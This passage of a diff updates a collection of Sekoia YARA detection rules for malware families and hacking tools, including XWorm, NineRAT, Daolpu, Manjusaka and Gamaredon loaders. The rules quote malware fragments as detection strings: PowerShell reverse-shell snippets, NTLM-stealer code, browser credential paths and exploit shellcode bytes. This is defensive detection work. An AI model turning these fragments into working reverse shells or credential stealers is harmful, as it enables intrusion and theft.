 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "htks.ini" ascii fullword
-		$s2 = "MyDemo" wide fullword
+		$ = "TacticalRMMInstaller" ascii
+		$ = "tacticalagent-" ascii
+		$ = "tactical/go" ascii
+		$ = "tacticalrmm." ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them and filesize < 1MB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 3MB and filesize < 8MB and 3 of them
 }
-rule SEKOIA_Apt_Gamaredon_Powerrevshell : FILE
+rule SEKOIA_Unknown_Quad7_Wildcard_Login : FILE
 {
 	meta:
-		description = "Detects Powershell reverse shell"
+		description = "Detects the (x|r|a)login bind shells"
 		author = "Sekoia.io"
-		id = "b5161c23-c607-4096-9f4a-1be516a0a614"
-		date = "2023-02-08"
+		id = "01510244-0795-4299-aa66-056a2b4682e7"
+		date = "2024-07-18"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_powerrevshell.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "fc5abcdf47641c1e7978cf076550f38987305bb2171b3e65f7865102a065af43"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/unknown_quad7_wildcard_login.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "4d9067e7cf517158337123a30a9bd0e3"
+		hash = "43ea387b8294cc4d0baaef6d26ff7c72"
+		hash = "777d6f907da38365924a0c2a12e973c5"
+		hash = "8542a3cbe232fe78baa0882736c61926"
+		hash = "1b08725acc371f6b7d05bb72d0c2d759"
+		logic_hash = "72de6fe656313bdd4f4b092ceca7248c67b8047c224104cd569dff7af1d86135"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -231366,89 +231999,103 @@ rule SEKOIA_Apt_Gamaredon_Powerrevshell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "iex $enc.GetString("
-		$ = "$stream.Write"
-		$ = ".).FullName"
-		$ = "Sockets.TcpClient"
-		$ = "\">\";"
+		$string1 = { 2f 62 69 6e 2f 73 68 00 2f 74 6d 70 2f 6c 6f 67 69 6e }
+		$string2 = { 2f 62 69 6e 2f 73 68 00 2d 63 00 65 78 69 74 20 30 }
 
 	condition:
-		all of them and filesize < 3000
+		uint32be( 0 ) == 0x7f454c46 and filesize < 180KB and @string2 - @string1 < 3400
 }
-
-rule SEKOIA_Rat_Win_Ninerat
+rule SEKOIA_Tool_Pivotnacci
 {
 	meta:
-		description = "Detect the NineRAT payload"
+		description = "Detects Pivotnacci"
 		author = "Sekoia.io"
-		id = "a9f4f78b-5b86-4ac1-9b9b-ba2672b938bf"
-		date = "2023-12-12"
+		id = "31ecb08a-fc92-4cbe-a865-7ce869a5fa6a"
+		date = "2024-04-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_ninerat.yar#L4-L31"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "bbb695444a6ec0d6049d0ce233ca37de6f78393e5ceb5d454867c8b554269684"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_pivotnacci.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b0e4bc997775fb5ff258a23e07a58b4897a2ce9d3fffab86e93919857e566d18"
 		score = 75
 		quality = 80
 		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "47e017b40d418374c0889e4d22aa48633b1d41b16b61b1f2897a39112a435d30"
-		hash2 = "82d4a0fef550af4f01a07041c16d851f262d859a3352475c62630e2c16a21def"
 
 	strings:
-		$ = "https://api.telegram.org/bot"
-		$ = "/getMe"
-		$ = "/upgrade"
-		$ = "/getFile"
-		$ = "/sendMessage"
-		$ = ">> Request send time:"
+		$pivotnacci = "pivotnacci"
+		$s1 = "Socks server => %s:%s"
+		$s2 = "The default listening address"
+		$s3 = "Socks server for HTTP agents"
+		$s4 = "Message returned by the agent web page"
+		$s5 = "Password to communicate with the agent"
+		$s6 = "To specify agent type in case is not automatically detected."
 
 	condition:
-		all of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "3ce78c89e2c0e795ad3382aa12e99683" )
+		$pivotnacci and 3 of ( $s* )
 }
-rule SEKOIA_Botnet_Lin_Tsunami : FILE
+rule SEKOIA_Manjusaka_Samples : FILE
 {
 	meta:
-		description = "Catch tsunami botnet based on string"
+		description = "Detects Manjusaka via protobuf struture names (Windows / Linux / implants / C2)"
 		author = "Sekoia.io"
-		id = "65d2ff89-064f-489a-a215-33197926a62d"
-		date = "2024-09-24"
+		id = "7aa8edb3-2e67-4632-af68-5b65c9aefe39"
+		date = "2022-08-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/botnet_lin_tsunami.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "536a28db011459d841652e25a852ccf2"
-		logic_hash = "8678ead4c863b2bc6bbb5e0023dee10f4e9f031bd0c8f515ad30d6145755ccaa"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/manjusaka_samples.yar#L1-L41"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "58dcc406c87a8ec66c0904c4cf518cb38bca1aa9058196ce5d496f6269258200"
 		score = 75
-		quality = 53
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$n = "NOTICE %s" ascii
-		$t = "TSUNAMI" ascii nocase
-		$s1 = "NICK" ascii fullword
-		$s2 = "GETSPOOFS" ascii fullword
-		$s3 = "IRC" ascii fullword
-		$s4 = "PONG" ascii
+		$ = ".protos.AgentStatusR" ascii wide
+		$ = ".protos.AgentsR" ascii wide
+		$ = ".protos.FileActionR" ascii wide
+		$ = ".protos.FileEntryR" ascii wide
+		$ = ".protos.HttpFileActionR" ascii wide
+		$ = ".protos.HttpFileEntryR" ascii wide
+		$ = ".protos.PassResultR" ascii wide
+		$ = ".protos.PortResultR" ascii wide
+		$ = ".protos.PortResultR" ascii wide
+		$ = ".protos.PortResultR" ascii wide
+		$ = ".protos.ConfigH" ascii wide
+		$ = ".protos.AgentUpdateH" ascii wide
+		$ = ".protos.PluginExecH" ascii wide
+		$ = ".protos.PluginLoadH" ascii wide
+		$ = ".protos.ReqCwdH" ascii wide
+		$ = ".protos.ReqCmdH" ascii wide
+		$ = ".protos.ReqListFileH" ascii wide
+		$ = ".protos.ReqCatFileH" ascii wide
+		$ = ".protos.ReqNetStatH" ascii wide
+		$ = ".protos.ReqTaskListH" ascii wide
+		$ = ".protos.ReqScreenH" ascii wide
+		$ = ".protos.FileEventH" ascii wide
+		$ = ".protos.HttpFileEventH" ascii wide
+		$ = ".protos.PassGetEventH" ascii wide
+		$ = ".protos.FileGetEventH" ascii wide
+		$ = ".protos.AgentEventR" ascii wide
 
 	condition:
-		uint32( 0 ) == 0x464c457f and #n > 40 and #t > 3 and 3 of ( $s* )
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 15 of them
 }
-rule SEKOIA_Apt_Apt28_Powershell_Ntlm_Stealer : FILE
+rule SEKOIA_Apt_Flightnight_Malicious_Lnk : FILE
 {
 	meta:
-		description = "Detects the NTLM Stealer used by APT28 against UA energy sector"
+		description = "Detects malicious LNK used by FlightNight"
 		author = "Sekoia.io"
-		id = "3fb5c472-6b1c-490e-b38f-4d4f1c472f43"
-		date = "2023-09-07"
+		id = "06f33ece-ac9f-4dd3-98fb-cd69305ee995"
+		date = "2024-04-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt28_powershell_ntlm_stealer.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "29d039bf7d7018ebbae187ae0f057161c3f9256076324f06167872adc0accfa7"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_flightnight_malicious_lnk.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "3446852709fe425b2c053ffdb9c078cf20e442ef50fe20402d3b4c9e9d8b543a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -231456,29 +232103,26 @@ rule SEKOIA_Apt_Apt28_Powershell_Ntlm_Stealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "'NTLM ' = [Convert]::ToBase64String"
-		$ = ".Prefixes.Add('http://localhost:8080/')"
-		$ = ".AddHeader('WWW-Authenticate', 'NTLM')"
-		$ = "GetValues('Authorization');"
-		$ = "[0] -split '\\s+';"
+		$s0 = "/c start /B " wide
+		$s1 = ".exe &" wide
+		$s2 = ".pdf" wide
+		$s3 = "%CD%" wide
 
 	condition:
-		3 of them and filesize < 4000
+		uint32be( 0 ) == 0x4c000000 and $s1 in ( @s0 .. @s2 ) and $s1 in ( @s0 .. @s0 + 100 ) and $s3
 }
-rule SEKOIA_Apt_Apt29_Wineloader_Malicious_Pdf : FILE
+rule SEKOIA_Apt_Cloudatlas_Rtf_Shellcode_Cve_2018_0798 : FILE
 {
 	meta:
-		description = "Detects malicious PDF used by APT29 to drop Wineloader"
+		description = "CloudAtlas Shellcode for CVE_2018_0798 "
 		author = "Sekoia.io"
-		id = "b1db731e-471e-493a-b76c-38d2808ccac9"
-		date = "2024-03-25"
+		id = "6c602c66-df40-4436-800f-e548dacc1e81"
+		date = "2022-12-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt29_wineloader_malicious_pdf.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "9712217ff3597468b48cdf45da588005de3a725ba554789bb7e5ae1b0f7c02a7"
-		hash = "3739b2eae11c8367b576869b68d502b97676fb68d18cc0045f661fbe354afcb9"
-		logic_hash = "784f5ab2602e2185e8253b5b8d9a084ede0604457b0a0674fceffbcb226e3ba1"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_cloudatlas_rtf_shellcode_cve_2018_0798.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a8c320ca81ef196b84a8fb08d9e02ef8cfb338024fa7e6776ff6c8c049b8e63c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -231486,109 +232130,121 @@ rule SEKOIA_Apt_Apt29_Wineloader_Malicious_Pdf : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "<</Type/Annot/Subtype/Link/Border[0 0 0]/Rect["
-		$s2 = "/A<</Type/Action/S/URI/URI("
-		$s3 = { 2f [2-10] 2e 70 68 70 29 3e 3e }
-		$s4 = "JamrulNormal"
+		$s1 = "6060606061616161616161616161616161616161FB0B00004bE8FFFFFFFFC35F83C71B33C966B908010f0d00ddd8d97424f4668137" ascii nocase
 
 	condition:
-		uint32be( 0 ) == 0x25504446 and $s2 in ( @s1 .. @s3 ) and $s4
+		filesize < 8MB and all of them
 }
-rule SEKOIA_Hacktool_Lazagne_Strings : FILE
+rule SEKOIA_Xworm_Dotnet_Injector
 {
 	meta:
-		description = "Detects LaZagne hacktool based on strings"
+		description = ".NET injector used by XWorm TA"
 		author = "Sekoia.io"
-		id = "5a5e7a07-1252-48cc-ada5-46e796c4e00e"
-		date = "2022-02-07"
+		id = "50581a9d-afc3-43da-9e34-3a553cbd01b4"
+		date = "2022-12-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_lazagne_strings.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a6db351fee9a28b1a6d82c2ce063088a1050ee8379cc13ca3cf8cc2038043951"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/xworm_dotnet_injector.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "4777edacf4719e602ae1fb7204ea97cd594277faa1c2b7ad430066ad82b40768"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$w1 = "lazagne.softwares"
-		$w2 = "pypykatz.lsadecryptor"
-		$l0 = "PyModule_GetDict"
-		$l1 = "softwares.sysadmin.filezilla"
-		$l2 = "softwares.walle"
-		$l3 = "softwares.databases.sqldeveloper"
-		$l4 = "softwares.wifi.wpa_supplicant"
+		$first_payload = "jBGIcSr2fKhj1ZT2YNLBTcYYeAw/vWUT98dCA/H6hpI+dY+lkoSe1ATx7XEIXKtAdTSwl1PKhNROoxstXsnsHTZbS2ikRLv6lmHd5v09DltsPeXIOA789wZC8qR1OScJFohGxuWQSQ8K2TAFUQAntIFdX+Om1QZUARdDnb4f+P8VFucU9avWD75yK1IcTDDDEYwvm/rwUYTqWitcrfIY+aFcgQwyvEzkN7Pbsah4Kts+XmK0C3TzlnDd2mz6TdsPphGbBxcbBdZGMTyzunZUEKRYea7xM6u+az9v7m6a1G6vhsSqz4C/nleDmzL2dIVnVR6Ni6+0hlExcP" wide
+		$rijndael_key1 = { e5 a0 b1 e8 89 be e8 8e 8e e4 bb a3 e5 ba b5 e9 85 8d e7 89 b9 e6 b0 8f e5 85 8b e9 9b 99 e8 89 be e5 8b 92 e6 8b 89 e6 a1 83 e9 ad 9a e6 88 91 e6 96 af e6 a1 83 e5 ba 95 e5 be b7 }
+		$rijndael_key2 = { e7 9b 9f e7 91 aa e6 a1 83 e9 87 91 e5 90 89 e9 97 95 e5 a0 b1 e9 9b 99 e9 97 95 e5 96 ac e5 ba 95 e5 a0 b1 e5 be b7 e6 8b 89 e5 92 8c e7 a0 b4 e7 88 be e9 a6 ac e6 88 91 e5 8a a0 }
+		$rijndael_key3 = { e6 9b b2 e6 b0 8f e5 ba b5 e5 a3 ab e9 97 95 e5 be b7 e6 96 af e8 9b 8b }
+		$s1 = "fullofdick"
+		$s2 = "holdmeback"
+		$s3 = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 and all of ( $l* ) ) or ( uint16be( 0 ) == 0x4d5a and all of ( $w* ) ) and filesize < 40MB
+		($first_payload and all of ( $rijndael_key* ) ) or 2 of ( $s* )
 }
-rule SEKOIA_Apt_Susp_Apt28_Uac0063_Malicious_Doc_Settings_Xml : FILE
+rule SEKOIA_Infostealer_Win_Daolpu_Str : FILE
 {
 	meta:
-		description = "Detects some suspected APT28 document settings.xml"
+		description = "Finds Daolpu Stealer samples based on specific strings."
 		author = "Sekoia.io"
-		id = "fd104985-6441-4fb6-8cc1-30afa4a7797b"
-		date = "2024-07-25"
+		id = "dde1cf12-48d8-45b6-b453-b7196e6b1271"
+		date = "2024-07-23"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_susp_apt28_uac0063_malicious_doc_settings_xml.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "0272acc6ed17c72320e4e7b0f5d449841d0ccab4ea89f48fd69d0a292cc5d39a"
-		logic_hash = "29b40a83340e71bfc38dc7050b3a21e62e2d2e506dbd077c1c7e430c8ff56d32"
-		score = 65
-		quality = 30
+		reference = "https://www.crowdstrike.com/blog/fake-recovery-manual-used-to-deliver-unidentified-stealer/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_daolpu_str.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9372a88efcdca6ca57f354fb31569522e5458271cc51dfedf09c6178a47a5b67"
+		score = 75
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "http://schemas.openxmlformats.org/" ascii fullword
-		$ = "Call svc.GetFolder(" ascii fullword
-		$ = "CreateTextFile(appdir" ascii fullword
-		$ = "Sub Document_Open() : On Error Resume Next" ascii fullword
+		$str01 = "Content-Type: %s%s%s" ascii
+		$str02 = "Content-Disposition: %s%s%s%s%s%s%s" ascii
+		$str03 = "\\CocCoc\\Browser\\User Data\\Local State" ascii
+		$str04 = "\\Microsoft\\Edge\\User Data\\Default\\Login Data" ascii
+		$str05 = "\\Mozilla\\Firefox\\Profiles" ascii
+		$str06 = "No MAC Address Found" ascii
+		$str07 = "C:\\Windows\\Temp\\" ascii
+		$str08 = "C:\\Windows\\Temp\\result.txt" ascii
+		$str09 = "Privatekey@2211#$" ascii
+		$str10 = "CryptStringToBinaryA Failed to convert BASE64 private key." ascii
+		$str11 = "taskkill /F /IM chrome.exe" ascii
 
 	condition:
-		2 of them and filesize < 1MB
+		uint16( 0 ) == 0x5A4D and 8 of them
 }
-
-rule SEKOIA_Ransomware_Lin_Avoslocker_Sections : FILE
+rule SEKOIA_Tool_Win_Sharpshares : FILE
 {
 	meta:
-		description = "Detect AvosLocker ransomware for Linux by using its section hashes"
+		description = "Finds sharpshares EXE based on strings"
 		author = "Sekoia.io"
-		id = "3a7bf14d-24fb-47c9-b073-dd734f808983"
-		date = "2022-02-21"
+		id = "ef90d573-12f8-4216-9a9e-96e7d1e841d0"
+		date = "2024-06-10"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_lin_avoslocker_sections.yar#L4-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "67becae97ccfaf2e62c0329e23a91b1134c265bc83b1fc9091b170a1e04f34d4"
+		reference = "https://github.com/mitchmoser/SharpShares/releases"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_win_sharpshares.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6aa96d7c24638451bde98497cc7c844c87612d81cc7826113729c80bd5180442"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "0cd7b6ea8857ce827180342a1c955e79c3336a6cf2000244e5cfd4279c5fc1b6"
-		hash2 = "7c935dcd672c4854495f41008120288e8e1c144089f1f06a23bd0a0f52a544b1"
-		hash3 = "10ab76cd6d6b50d26fde5fe54e8d80fceeb744de8dbafddff470939fac6a98c4"
+
+	strings:
+		$str01 = "<GetAllShares>b__0" ascii
+		$str02 = "<SearchLDAP>b__0_0" ascii
+		$str03 = "get_AccessControlType" ascii
+		$str04 = "get_IdentityReference" ascii
+		$str05 = "get_PropertiesToLoad" ascii
+		$str06 = "SharpShares\\obj\\Release\\SharpShares.pdb" ascii
+		$str07 = "/filter:SYSVOL,NETLOGON,IPC$,PRINT$" wide
+		$str08 = "/threads:50 /ldap:servers" wide
+		$str09 = "SharpShares.exe" ascii wide
+		$str10 = "[+] LDAP Search Results:" wide
+		$str11 = "[+] Finished Enumerating Shares" wide
 
 	condition:
-		uint32( 0 ) == 0x464c457f and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "91476dafa5ef669483350538fa6ec4cb" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "c2b21b2556c9d751e203965c825f8a81" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "f858d36231ba743ad8c898d86a67a864" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "7dea362b3fac8e00956a4952a3d4f474" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "489c87d7b1a694980587dfb413fb2afc" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "972e27e9f115278244f5e4ae89dd412a" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "d1f5b688a92b611e1363945fa552a9d7" )
+		uint16( 0 ) == 0x5A4D and 6 of them
 }
-rule SEKOIA_Infostealer_Win_Agrat : FILE
+rule SEKOIA_Apt_Gamaredon_Gammaload_Malicioushta : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects Gamaredon's GammaLoad HTA"
 		author = "Sekoia.io"
-		id = "472effe8-5044-4ca1-88e0-3e19d445b9d1"
-		date = "2022-06-01"
+		id = "e5e502db-7f37-40f2-9ba3-81e158e767db"
+		date = "2022-08-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_agrat.yar#L1-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5b02880dbc75d9e4d95ec55c8e8630a47198ee4cc25e3ff79c93e9fe634fadca"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_gammaload_malicioushta.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e41ce63e7c6df2edb548ddc57d51af914dab9200e37eb12463169d587205aa7a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -231596,35 +232252,27 @@ rule SEKOIA_Infostealer_Win_Agrat : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str00 = "Vault.txt" wide
-		$str01 = "Credman.txt" wide
-		$str02 = "[Networks] {0}" wide
-		$str03 = "[Screenshot] {0}" wide
-		$str04 = "[Twitch] {0}" wide
-		$str05 = "Servers.txt" wide
-		$str06 = "[WindscribeVPN] {0}" wide
-		$str07 = "[{0}] Thread finished!" wide
-		$str08 = "[ERROR] Unable to enumerate vaults. Error (0x" wide
-		$str09 = "snowflake-ssh" wide
-		$str10 = "//setting[@name='Password']/value" wide
-		$str11 = "MakeScreenshot" ascii
-		$sys = "System.Collections.Generic.IEnumerator<Stealer." ascii
+		$s1 = "platform = window.navigator?.userAgentData?.platform" ascii fullword
+		$s2 = "'Win32', 'Win64', 'Windows', 'WinCE'" ascii
+		$s3 = "dcreate.download ="
+		$s4 = "dcreate.href = 'data:application/x-rar-compressed;base64"
+		$s5 = "= \"UmFyI"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and #sys > 10
+		uint32be( 0 ) == 0x3c68746d and filesize < 400KB and filesize > 50KB and 4 of them
 }
-rule SEKOIA_Apt_Kimsuky_Sharptongue_Strings : FILE
+rule SEKOIA_Apt_Badmagic_Listfiles_Pshscript : FILE
 {
 	meta:
-		description = "Detects SharpTongue variants."
+		description = "Detects BadMagic ListFiles powershell script"
 		author = "Sekoia.io"
-		id = "56027edb-4e6e-40ec-a1b9-36c52b0dd3ec"
-		date = "2022-07-29"
+		id = "55f1c409-234e-4feb-91a3-9bf5c41ec2b8"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_kimsuky_sharptongue_strings.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a7a9045485f6e713a8ae1bc87cd1296d64905b18e5d13d6e2b9a95328181af54"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_badmagic_listfiles_pshscript.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "4401d31e4b0484776aab51c161a301fc4ee3e944a1669df763bd274014178368"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -231632,128 +232280,109 @@ rule SEKOIA_Apt_Kimsuky_Sharptongue_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "Post0.Open" ascii wide
-		$s2 = ".php?op=" ascii wide
-		$s3 = "s=s&Mid(c,ix*d+jx+1,1)" ascii wide
-		$s4 = "curl -o " ascii wide
+		$ = "$env:USERPROFILE"
+		$ = "-Include *.jpg, *.odt, *.doc, *.docx"
 
 	condition:
-		$s2 in ( @s1 .. @s1 + 200 ) or $s2 in ( @s4 .. @s4 + 200 ) or $s3 and filesize < 500KB
+		all of them and filesize < 1KB
 }
-rule SEKOIA_Implant_Win_Havoc_Default_Strings : FILE
+
+rule SEKOIA_Dropper_Win_Ninerat
 {
 	meta:
-		description = "Finds Havoc implants based on the embedded default strings"
+		description = "NineRAT dropper"
 		author = "Sekoia.io"
-		id = "955c2211-4502-4258-ba4c-0d96a5624283"
-		date = "2022-10-07"
+		id = "798e3bee-4cee-4647-abda-3c3dcc602f0a"
+		date = "2023-12-12"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_win_havoc_default_strings.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "dbf17e579071f265961657d73c6a2e51630b23e80376491df2e631cee5ffb1b4"
+		reference = "https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/dropper_win_ninerat.yar#L4-L41"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "00f69545c7351fba8b45e2b4d21855ba8ae94f2d10df199732665e8f3f00c1b4"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "534f5612954db99c86baa67ef51a3ad88bc21735bce7bb591afa8a4317c35433"
+		hash2 = "f91188d23b14526676706a5c9ead05c1a91ea0b9d6ac902623bc565e1c200a59"
 
 	strings:
-		$str01 = "C:\\Windows\\System32\\notepad.exe" ascii
-		$str02 = "C:\\Windows\\SysWOW64\\notepad.exe" ascii
-		$str03 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" ascii
-		$str04 = "POST" wide
-		$str05 = "\\??\\C:\\Windows\\System32\\ntdll.dll" wide
-		$str06 = "X-Havoc: true" ascii
-		$str07 = "X-Havoc-Agent: Demon" ascii
-		$str08 = "/text.gif" ascii
